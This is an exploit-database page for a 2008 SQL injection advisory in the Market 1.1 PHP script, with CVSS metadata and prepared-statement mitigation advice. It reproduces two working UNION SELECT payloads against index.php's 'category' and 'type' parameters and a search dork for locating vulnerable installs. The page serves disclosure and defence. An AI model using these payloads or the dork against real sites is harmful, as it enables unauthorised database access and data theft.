header-logo
Suggest Exploit
vendor:
Market
by:
~!Dok_tOR!~
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Market
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:matterdaddy:market
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Market SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input in 'category' and 'type' parameters of 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use prepared statements (with parameterized queries) for SQL queries.
Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*

Dork:

made by matterdaddy

# milw0rm.com [2008-08-25]

Navigation

Suggest Exploit

Services By CQR